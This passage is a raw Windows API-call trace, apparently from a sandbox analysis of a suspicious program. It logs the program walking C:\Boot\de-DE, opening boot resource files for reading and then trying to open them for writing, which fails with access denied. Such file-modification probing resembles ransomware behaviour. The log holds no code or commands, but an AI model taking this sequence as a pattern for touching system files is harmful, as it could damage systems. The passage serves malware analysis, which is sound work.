(HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0069.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0069.345] AreFileApisANSI () returned 1 [0069.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88450 [0069.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88450, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\de-DE") returned 14 [0069.345] CreateFileW (lpFileName="C:\\Boot\\de-DE" (normalized: "c:\\boot\\de-de"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.345] GetLastError () returned 0x5 [0069.345] GetLastError () returned 0x5 [0069.345] SetLastError (dwErrCode=0x5) [0069.345] GetLastError () returned 0x5 [0069.345] SetLastError (dwErrCode=0x5) [0069.345] GetLastError () returned 0x5 [0069.345] SetLastError (dwErrCode=0x5) [0069.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.345] AreFileApisANSI () returned 1 [0069.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0069.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\de-DE") returned 14 [0069.346] CreateFileW (lpFileName="C:\\Boot\\de-DE" (normalized: "c:\\boot\\de-de"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.346] GetLastError () returned 0x5 [0069.346] GetLastError () returned 0x5 [0069.346] SetLastError (dwErrCode=0x5) [0069.346] GetLastError () returned 0x5 [0069.346] SetLastError (dwErrCode=0x5) [0069.346] GetLastError () returned 0x5 [0069.346] SetLastError (dwErrCode=0x5) [0069.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0069.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.346] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0069.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0069.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0069.346] FindFirstFileExW (in: lpFileName="C:\\Boot\\de-DE\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78250 [0069.346] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.347] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48079da, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0069.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0069.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0069.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.347] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.347] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.347] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.347] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0069.348] AreFileApisANSI () returned 1 [0069.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\de-DE\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.348] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.348] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0069.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0069.348] AreFileApisANSI () returned 1 [0069.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0069.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 30 [0069.348] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0069.358] GetFileType (hFile=0x41c) returned 0x1 [0069.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.359] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.359] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.359] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.359] CloseHandle (hObject=0x41c) returned 1 [0069.359] AreFileApisANSI () returned 1 [0069.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0069.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 30 [0069.360] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.360] GetLastError () returned 0x5 [0069.360] GetLastError () returned 0x5 [0069.360] SetLastError (dwErrCode=0x5) [0069.360] GetLastError () returned 0x5 [0069.360] SetLastError (dwErrCode=0x5) [0069.360] GetLastError () returned 0x5 [0069.360] SetLastError (dwErrCode=0x5) [0069.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0069.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.360] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0069.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0069.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.361] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.361] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.361] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.361] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.361] AreFileApisANSI () returned 1 [0069.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\de-DE\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\de-DE\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.361] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.361] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0069.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.361] AreFileApisANSI () returned 1 [0069.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0069.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\de-DE\\memtest.exe.mui") returned 30 [0069.362] CreateFileW (lpFileName="C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0069.362] GetFileType (hFile=0x41c) returned 0x1 [0069.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.362] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.362] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.362] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.362] CloseHandle (hObject=0x41c) returned 1 [0069.363] AreFileApisANSI () returned 1 [0069.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0069.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\de-DE\\memtest.exe.mui") returned 30 [0069.363] CreateFileW (lpFileName="C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.363] GetLastError () returned 0x5 [0069.363] GetLastError () returned 0x5 [0069.363] SetLastError (dwErrCode=0x5) [0069.363] GetLastError () returned 0x5 [0069.363] SetLastError (dwErrCode=0x5) [0069.363] GetLastError () returned 0x5 [0069.363] SetLastError (dwErrCode=0x5) [0069.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.363] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.363] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.363] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69178, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓뎠")) returned 0 [0069.363] FindClose (in: hFindFile=0x78250 | out: hFindFile=0x78250) returned 1 [0069.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0069.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0069.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0069.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0069.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 